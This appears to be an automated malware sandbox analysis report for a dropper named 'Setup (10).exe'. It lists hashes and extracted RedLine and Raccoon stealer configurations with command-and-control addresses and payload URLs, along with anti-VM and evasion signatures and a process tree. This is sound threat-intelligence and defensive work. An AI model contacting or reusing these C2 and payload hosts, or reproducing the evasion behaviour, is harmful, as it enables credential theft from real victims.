Overview
overview
10Static
static
Setup (1).exe
windows10_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows10_x64
10Setup (24).exe
windows10_x64
10Setup (25).exe
windows10_x64
10Setup (26).exe
windows10_x64
10Setup (27).exe
windows10_x64
10Setup (28).exe
windows10_x64
10Setup (29).exe
windows10_x64
10Setup (3).exe
windows10_x64
10Setup (30).exe
windows10_x64
10Setup (31).exe
windows10_x64
10Setup (4).exe
windows10_x64
10Setup (5).exe
windows10_x64
10Setup (6).exe
windows10_x64
10Setup (7).exe
windows10_x64
10Setup (8).exe
windows10_x64
10Setup (9).exe
windows10_x64
Setup.exe
windows10_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
1797s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
01-09-2021 13:18
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win10v20210408
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win10v20210408
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win10v20210408
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win10v20210408
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win10v20210408
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win10v20210408
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win10v20210408
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win10v20210408
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win10v20210408
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win10v20210408
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win10v20210408
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win10v20210408
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win10v20210408
General
-
Target
Setup (10).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
https://ia601409.us.archive.org/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435.txt
Extracted
https://kmsauto.us/1/fix.txt
Extracted
redline
bratanchikAYE
45.14.49.232:63850
Extracted
redline
spnewportspectr
135.148.139.222:1594
Extracted
redline
NORMAN2
45.14.49.184:27587
Extracted
raccoon
d02c5d65069fc7ce1993e7c52edf0c9c4c195c81
-
url4cnc
https://telete.in/open3entershift
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4080 2708 rundll32.exe 307 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 36 IoCs
resource yara_rule behavioral2/files/0x000100000001ab4d-131.dat family_redline behavioral2/files/0x000100000001ab4d-166.dat family_redline behavioral2/memory/4660-266-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/4660-264-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/4696-273-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/4696-277-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/4780-295-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/4876-310-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/4192-339-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/4332-349-0x000000000041C5BE-mapping.dmp family_redline behavioral2/memory/4376-359-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/4988-355-0x00000000054E0000-0x0000000005AE6000-memory.dmp family_redline behavioral2/memory/4988-325-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/4804-382-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/4632-375-0x000000000041C5BE-mapping.dmp family_redline behavioral2/memory/4332-374-0x0000000005710000-0x0000000005D16000-memory.dmp family_redline behavioral2/memory/4420-398-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/3960-408-0x000000000041C5BE-mapping.dmp family_redline behavioral2/memory/4420-413-0x0000000004C90000-0x0000000005296000-memory.dmp family_redline behavioral2/memory/3608-411-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/3960-426-0x00000000056E0000-0x0000000005CE6000-memory.dmp family_redline behavioral2/memory/752-432-0x000000000041C5BE-mapping.dmp family_redline behavioral2/memory/5052-439-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/3720-459-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/312-486-0x000000000041C5BE-mapping.dmp family_redline behavioral2/memory/4348-489-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/4112-510-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/5260-524-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/5464-538-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/5600-550-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/5964-571-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/5940-569-0x000000000041C5BE-mapping.dmp family_redline behavioral2/memory/6140-582-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/5552-600-0x000000000041C5CA-mapping.dmp family_redline behavioral2/memory/5488-610-0x000000000041C5EE-mapping.dmp family_redline behavioral2/memory/5976-635-0x000000000041C5CA-mapping.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
resource yara_rule behavioral2/memory/3812-311-0x0000000000400000-0x0000000000593000-memory.dmp family_vidar behavioral2/memory/3812-307-0x0000000000790000-0x0000000000863000-memory.dmp family_vidar behavioral2/memory/4780-327-0x0000000005130000-0x0000000005736000-memory.dmp family_vidar behavioral2/memory/5164-630-0x000000000049ECBD-mapping.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 26 IoCs
pid Process 1096 1A1ESKlVX41_1THLjvCaHbzq.exe 3864 MWbteUyr5p9Ka8oNImyf3Z6c.exe 3956 UMcsq7iNj84kTCq8IPSu56yx.exe 1248 W7oljYTvb0greJisxX3M5pId.exe 2372 1nTc5k_iLIXXp3F58XLfhiQY.exe 1524 cHsmIVuizu0y63AkrguwLy62.exe 648 No95Y7jV2KVteOKUHG5yTvEj.exe 3056 U8ajrH3cGZmccQG6aTCFeCtQ.exe 2376 _gbSI4Sq2zHEv_J6xvQFcEqZ.exe 2652 iriIOV1JbrvxZUJwLmGWZdTY.exe 3008 jgwmA443nvNaVLUFMYx8WkZ0.exe 3732 7GJ44oNz7WWzrR5c8PZf9648.exe 3288 fEG_jArGjfToLSIAV6Lzwwo0.exe 3808 YVqlGCkYGugXx1JCqoqvJbeD.exe 2920 5_N5QOwcNDsgVJGkLgHZiD74.exe 2272 FX6pHdGjUB080hks8a5CkPlS.exe 980 2HMgOT_jSZqsSbYiWn8DQHEr.exe 3944 vJ22bESZ6vvECr7CUApjlvQK.exe 3812 DSffqnuQ35FG1J43cdDR5UeV.exe 212 whVPy7FlLWde_oujxKbnepxf.exe 428 2YsYgyQ8WjW67NVR0HqPVr_5.exe 188 2AkiF393TVUOviqMKz1H9gXm.exe 1568 tTeqaVlIRlc_hhKtOTehgzOE.exe 4352 aJff0hDL9B3WXmr_DSumlwW4.exe 4364 5OOo76P_H0YAxkVxSJ2VRdvt.exe 4492 2AkiF393TVUOviqMKz1H9gXm.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FX6pHdGjUB080hks8a5CkPlS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FX6pHdGjUB080hks8a5CkPlS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UMcsq7iNj84kTCq8IPSu56yx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UMcsq7iNj84kTCq8IPSu56yx.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Setup (10).exe -
Loads dropped DLL 2 IoCs
pid Process 4492 2AkiF393TVUOviqMKz1H9gXm.exe 4492 2AkiF393TVUOviqMKz1H9gXm.exe -
resource yara_rule behavioral2/files/0x000100000001ab5c-127.dat themida behavioral2/files/0x000100000001ab68-186.dat themida behavioral2/files/0x000100000001ab5c-165.dat themida behavioral2/files/0x000100000001ab68-162.dat themida behavioral2/memory/3956-220-0x0000000000910000-0x0000000000911000-memory.dmp themida behavioral2/memory/2272-238-0x0000000000E70000-0x0000000000E71000-memory.dmp themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UMcsq7iNj84kTCq8IPSu56yx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FX6pHdGjUB080hks8a5CkPlS.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 673 freegeoip.app 1055 ip-api.com 28 ipinfo.io 119 ip-api.com 131 ipinfo.io 146 ipinfo.io 652 freegeoip.app 29 ipinfo.io 130 ipinfo.io 371 ipinfo.io 639 freegeoip.app 645 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3956 UMcsq7iNj84kTCq8IPSu56yx.exe 2272 FX6pHdGjUB080hks8a5CkPlS.exe -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 5OOo76P_H0YAxkVxSJ2VRdvt.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe 5OOo76P_H0YAxkVxSJ2VRdvt.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe 5OOo76P_H0YAxkVxSJ2VRdvt.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 5OOo76P_H0YAxkVxSJ2VRdvt.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 5OOo76P_H0YAxkVxSJ2VRdvt.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 64 IoCs
pid pid_target Process procid_target 5252 3732 WerFault.exe 92 5240 3008 WerFault.exe 95 5432 2372 WerFault.exe 78 5500 3808 WerFault.exe 101 5688 3732 WerFault.exe 92 5700 3008 WerFault.exe 95 5808 3808 WerFault.exe 101 5836 2372 WerFault.exe 78 6032 3008 WerFault.exe 95 5980 3732 WerFault.exe 92 3620 3808 WerFault.exe 101 4708 2372 WerFault.exe 78 5676 3808 WerFault.exe 101 5528 3008 WerFault.exe 95 5752 2920 WerFault.exe 100 4000 2372 WerFault.exe 78 5336 3008 WerFault.exe 95 5764 2920 WerFault.exe 100 6344 2372 WerFault.exe 78 6680 3732 WerFault.exe 92 6720 3732 WerFault.exe 92 7088 3808 WerFault.exe 101 7112 2372 WerFault.exe 78 7120 3732 WerFault.exe 92 6948 6784 WerFault.exe 237 7056 3808 WerFault.exe 101 5676 2372 WerFault.exe 78 5840 3808 WerFault.exe 101 7268 2372 WerFault.exe 78 7416 2920 WerFault.exe 100 7712 2920 WerFault.exe 100 7744 2372 WerFault.exe 78 3868 2372 WerFault.exe 78 7508 2372 WerFault.exe 78 7624 8168 WerFault.exe 279 7924 2372 WerFault.exe 78 7860 2920 WerFault.exe 100 7308 2372 WerFault.exe 78 7456 2920 WerFault.exe 100 7924 2372 WerFault.exe 78 4712 7300 WerFault.exe 303 7560 7620 WerFault.exe 304 8104 6116 WerFault.exe 306 8096 3008 WerFault.exe 95 8852 3008 WerFault.exe 95 8680 3008 WerFault.exe 95 8160 3192 WerFault.exe 357 9464 3008 WerFault.exe 95 10492 3008 WerFault.exe 95 1492 10932 WerFault.exe 411 3632 6212 WerFault.exe 436 13088 2920 WerFault.exe 100 13416 13140 WerFault.exe 502 13988 2920 WerFault.exe 100 14040 9828 WerFault.exe 522 12528 14284 WerFault.exe 529 15068 12712 WerFault.exe 554 13568 14480 WerFault.exe 561 12880 14908 WerFault.exe 563 15472 8628 WerFault.exe 577 10460 16304 WerFault.exe 589 16812 14352 WerFault.exe 602 16884 368 WerFault.exe 626 18288 17708 WerFault.exe 648 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2300 schtasks.exe 3488 schtasks.exe -
Kills process with taskkill 6 IoCs
pid Process 11604 taskkill.exe 11412 taskkill.exe 8972 taskkill.exe 3596 taskkill.exe 2324 taskkill.exe 10792 taskkill.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 156 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 372 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 145 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3728 Setup (10).exe 3728 Setup (10).exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3056 U8ajrH3cGZmccQG6aTCFeCtQ.exe Token: SeDebugPrivilege 1096 1A1ESKlVX41_1THLjvCaHbzq.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3728 wrote to memory of 1096 3728 Setup (10).exe 84 PID 3728 wrote to memory of 1096 3728 Setup (10).exe 84 PID 3728 wrote to memory of 3864 3728 Setup (10).exe 82 PID 3728 wrote to memory of 3864 3728 Setup (10).exe 82 PID 3728 wrote to memory of 3864 3728 Setup (10).exe 82 PID 3728 wrote to memory of 1248 3728 Setup (10).exe 83 PID 3728 wrote to memory of 1248 3728 Setup (10).exe 83 PID 3728 wrote to memory of 1248 3728 Setup (10).exe 83 PID 3728 wrote to memory of 3956 3728 Setup (10).exe 80 PID 3728 wrote to memory of 3956 3728 Setup (10).exe 80 PID 3728 wrote to memory of 3956 3728 Setup (10).exe 80 PID 3728 wrote to memory of 1524 3728 Setup (10).exe 81 PID 3728 wrote to memory of 1524 3728 Setup (10).exe 81 PID 3728 wrote to memory of 1524 3728 Setup (10).exe 81 PID 3728 wrote to memory of 648 3728 Setup (10).exe 79 PID 3728 wrote to memory of 648 3728 Setup (10).exe 79 PID 3728 wrote to memory of 648 3728 Setup (10).exe 79 PID 3728 wrote to memory of 2372 3728 Setup (10).exe 78 PID 3728 wrote to memory of 2372 3728 Setup (10).exe 78 PID 3728 wrote to memory of 2372 3728 Setup (10).exe 78 PID 3728 wrote to memory of 3056 3728 Setup (10).exe 91 PID 3728 wrote to memory of 3056 3728 Setup (10).exe 91 PID 3728 wrote to memory of 2376 3728 Setup (10).exe 86 PID 3728 wrote to memory of 2376 3728 Setup (10).exe 86 PID 3728 wrote to memory of 2652 3728 Setup (10).exe 85 PID 3728 wrote to memory of 2652 3728 Setup (10).exe 85 PID 3728 wrote to memory of 2652 3728 Setup (10).exe 85 PID 3728 wrote to memory of 3008 3728 Setup (10).exe 95 PID 3728 wrote to memory of 3008 3728 Setup (10).exe 95 PID 3728 wrote to memory of 3008 3728 Setup (10).exe 95 PID 3728 wrote to memory of 3288 3728 Setup (10).exe 93 PID 3728 wrote to memory of 3288 3728 Setup (10).exe 93 PID 3728 wrote to memory of 3288 3728 Setup (10).exe 93 PID 3728 wrote to memory of 3732 3728 Setup (10).exe 92 PID 3728 wrote to memory of 3732 3728 Setup (10).exe 92 PID 3728 wrote to memory of 3732 3728 Setup (10).exe 92 PID 3728 wrote to memory of 3944 3728 Setup (10).exe 97 PID 3728 wrote to memory of 3944 3728 Setup (10).exe 97 PID 3728 wrote to memory of 3808 3728 Setup (10).exe 101 PID 3728 wrote to memory of 3808 3728 Setup (10).exe 101 PID 3728 wrote to memory of 3808 3728 Setup (10).exe 101 PID 3728 wrote to memory of 2920 3728 Setup (10).exe 100 PID 3728 wrote to memory of 2920 3728 Setup (10).exe 100 PID 3728 wrote to memory of 2920 3728 Setup (10).exe 100 PID 3728 wrote to memory of 2272 3728 Setup (10).exe 99 PID 3728 wrote to memory of 2272 3728 Setup (10).exe 99 PID 3728 wrote to memory of 2272 3728 Setup (10).exe 99 PID 3728 wrote to memory of 980 3728 Setup (10).exe 98 PID 3728 wrote to memory of 980 3728 Setup (10).exe 98 PID 3728 wrote to memory of 980 3728 Setup (10).exe 98 PID 3728 wrote to memory of 3812 3728 Setup (10).exe 106 PID 3728 wrote to memory of 3812 3728 Setup (10).exe 106 PID 3728 wrote to memory of 3812 3728 Setup (10).exe 106 PID 3728 wrote to memory of 428 3728 Setup (10).exe 103 PID 3728 wrote to memory of 428 3728 Setup (10).exe 103 PID 3728 wrote to memory of 428 3728 Setup (10).exe 103 PID 3728 wrote to memory of 212 3728 Setup (10).exe 102 PID 3728 wrote to memory of 212 3728 Setup (10).exe 102 PID 3728 wrote to memory of 212 3728 Setup (10).exe 102 PID 3728 wrote to memory of 188 3728 Setup (10).exe 109 PID 3728 wrote to memory of 188 3728 Setup (10).exe 109 PID 3728 wrote to memory of 188 3728 Setup (10).exe 109 PID 3728 wrote to memory of 1568 3728 Setup (10).exe 107 PID 3728 wrote to memory of 1568 3728 Setup (10).exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Users\Admin\Documents\1nTc5k_iLIXXp3F58XLfhiQY.exe"C:\Users\Admin\Documents\1nTc5k_iLIXXp3F58XLfhiQY.exe"2⤵
- Executes dropped EXE
PID:2372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 7363⤵
- Program crash
PID:5432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 7763⤵
- Program crash
PID:5836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 7563⤵
- Program crash
PID:4708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 7443⤵
- Program crash
PID:4000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 9483⤵
- Program crash
PID:6344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 11923⤵
- Program crash
PID:7112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 11963⤵
- Program crash
PID:5676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 13043⤵
- Program crash
PID:7268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 8163⤵
- Program crash
PID:7744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 13523⤵
- Program crash
PID:3868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 13923⤵
- Program crash
PID:7508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 14723⤵
- Program crash
PID:7924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 15083⤵
- Program crash
PID:7308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 14883⤵
- Program crash
PID:7924
-
-
-
C:\Users\Admin\Documents\No95Y7jV2KVteOKUHG5yTvEj.exe"C:\Users\Admin\Documents\No95Y7jV2KVteOKUHG5yTvEj.exe"2⤵
- Executes dropped EXE
PID:648
-
-
C:\Users\Admin\Documents\UMcsq7iNj84kTCq8IPSu56yx.exe"C:\Users\Admin\Documents\UMcsq7iNj84kTCq8IPSu56yx.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3956
-
-
C:\Users\Admin\Documents\cHsmIVuizu0y63AkrguwLy62.exe"C:\Users\Admin\Documents\cHsmIVuizu0y63AkrguwLy62.exe"2⤵
- Executes dropped EXE
PID:1524
-
-
C:\Users\Admin\Documents\MWbteUyr5p9Ka8oNImyf3Z6c.exe"C:\Users\Admin\Documents\MWbteUyr5p9Ka8oNImyf3Z6c.exe"2⤵
- Executes dropped EXE
PID:3864 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:5876
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵PID:4900
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵PID:11092
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffb7a064f50,0x7ffb7a064f60,0x7ffb7a064f704⤵PID:11260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1548 /prefetch:24⤵PID:11020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:84⤵PID:4932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2192 /prefetch:84⤵PID:10916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:14⤵PID:13232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:14⤵PID:13256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:14⤵PID:12576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:14⤵PID:12640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:14⤵PID:12980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:14⤵PID:13096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:84⤵PID:10384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,14571515638167402496,295366625722106249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:84⤵PID:13956
-
-
